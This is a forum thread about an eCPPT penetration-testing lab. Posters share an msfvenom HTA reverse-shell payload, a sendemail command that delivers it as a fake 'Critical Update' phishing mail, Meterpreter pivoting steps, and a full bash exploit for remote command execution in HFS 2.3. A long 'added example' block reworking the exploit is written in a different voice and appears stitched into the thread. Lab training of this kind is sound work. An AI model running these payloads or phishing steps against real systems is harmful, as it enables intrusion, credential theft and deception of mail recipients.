eCPPT Client-side attacks CTF1


Got stuck at Task 2: I am not able to send any attachment with a suitable extension (.exe, .doc, etc.) to the discovered email (I got a 554 error with sendemail). Any hints, please? Thank you!

It does not work because .exe and .doc payloads are automatically blocked.
You need to create a .hta payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=YourIP LPORT=YourPort -f hta-psh -o shell.hta

Next you can send the email with the malicious attachment via sendemail:

sendemail -f attacker@evil.com -t techsupport@staff.fincorp.com -u "Critical Update" -m "Please review and install the attached urgent update." -a shell.hta -s mail.server.local:25

If you can find flags 3 and 4, let me know something; I never managed to finish it! D:


Thanks a lot!! I'll let you know if I go ahead with the next points.

I cannot complete flag 4. Please, someone help!

For flag 3 I did this:
(but I cannot get flag 4 - I couldn't elevate my privileges from this point)

1) Add internal route

run autoroute -s 10.2.22.0/24

2) Port forward HFS to Kali

portfwd add -l 8888 -p 80 -r 10.2.22.193

Verify:

curl -I http://127.0.0.1:8888

Expect: Server: HFS 2.3m

3) Create HFS RCE script

cat > hfs_rce.sh << 'EOF'
#!/usr/bin/env bash
# HFS 2.3 RCE through the {.exec.} macro in the search parameter
# Usage: ./hfs_rce.sh <base_url> "<command>"
banner() {
cat <<'B'
HFS 2.3 RCE - @VeryLazyTech - Medium
B
}
banner
set -e
if [ $# -ne 2 ]; then
    echo "Usage: $0 <base_url> \"<command>\"" >&2
    exit 1
fi
# PowerShell -enc expects base64 of the UTF-16LE script; the [S] markers delimit the command output
commands=$(echo "echo [S]; $2; echo [S];" | iconv -t UTF-16LE | base64 -w 0)
payload="/?n=%0A&cmd=cmd+/c+powershell+-enc+$commands&search=%25xxx%25url%25:%password%\}\{.exec|\{.?cmd.\}|timeout=15|out=abc.\}\{.?n.\}\{.?n.\}RESULT:\{.?n.\}\{.^abc.\}====\{.?n.\}"
url=$1$payload
printf "[*] Sending payload\n"
response=$(curl -s -X GET "$url")
# Keep only the lines between the first and second [S] marker (brackets escaped so awk matches them literally)
result=$(echo "$response" | awk 'BEGIN {found=0} /\[S\]/ {if (found == 0) {found=1; next} else {exit}} found {print}')
printf "[*] Output:\n%s\n" "$result"
EOF

chmod +x hfs_rce.sh
Test RCE:

./hfs_rce.sh http://127.0.0.1:8888 “whoami”

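As an added example (not part of the CTF and not the hfs_rce.sh posted above), the script below isolates the three pieces that exploit relies on so each can be checked offline before anything goes through the pivot: the UTF-16LE/base64 encoding PowerShell's -enc expects, the request URL carrying the HFS search macro, and extraction of the command output from between the [S] markers, including the case where the markers never come back (the macro did not execute, so there is nothing to parse). The function names and the sample HFS response are assumptions constructed for this example.

```shell
#!/usr/bin/env bash
# Added example: offline dry run of the steps hfs_rce.sh performs.
# Function names and the sample response are assumptions of this example,
# not data from the CTF target.

# PowerShell -EncodedCommand wants base64 of the UTF-16LE script (no BOM).
# The command is wrapped in [S] markers so its output can be cut out of the
# HTML that HFS wraps around it.
encode_ps_command() {
    printf 'echo [S]; %s; echo [S];' "$1" | iconv -f UTF-8 -t UTF-16LE | base64 -w 0
}

# Same request hfs_rce.sh sends: %0A in n=, the {.exec.} macro in search=,
# and the encoded command spliced into cmd=.
build_hfs_url() {
    local base="$1" enc="$2"
    local macro='%25xxx%25url%25:%password%\}\{.exec|\{.?cmd.\}|timeout=15|out=abc.\}\{.?n.\}\{.?n.\}RESULT:\{.?n.\}\{.^abc.\}====\{.?n.\}'
    printf '%s\n' "${base}/?n=%0A&cmd=cmd+/c+powershell+-enc+${enc}&search=${macro}"
}

# Print only the lines between the first and second [S] marker of the response
# read from stdin. CRLF from cmd.exe is stripped. Exit 1 when no opening marker
# is found, i.e. the macro never ran (wrong HFS version, patched, or the
# port forward is not pointing at HFS at all).
extract_between_markers() {
    awk 'BEGIN { found = 0 }
         { sub(/\r$/, "") }
         /\[S\]/ { if (found == 0) { found = 1; next } else { exit } }
         found { print }
         END { exit (found ? 0 : 1) }'
}

# Dry run over a constructed sample of an HFS reply to "whoami"
# (sample data, not captured from a target).
hfs_dry_run() {
    printf '<html><body>\r\n[S]\r\nnt authority\\system\r\n[S]\r\n====\r\n</body></html>\r\n' \
        | extract_between_markers
}

# Demo when run directly: the request that would be sent and the parsed output.
enc=$(encode_ps_command "whoami")
echo "[*] URL: $(build_hfs_url http://127.0.0.1:8888 "$enc")"
echo "[*] Parsed output: $(hfs_dry_run)"
```

Run it once with no target to confirm iconv and base64 behave as expected on your box; then, if a real run returns nothing, check the exit status of the marker extraction first: an empty result with status 1 means the response never contained the markers, which points at the pivot or the HFS version rather than at the command itself.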

Mail sent successfully! Tried NC and MSF listener for 3 hours+ and still no connection. Do I need to wait for office hours for someone to click? Thanks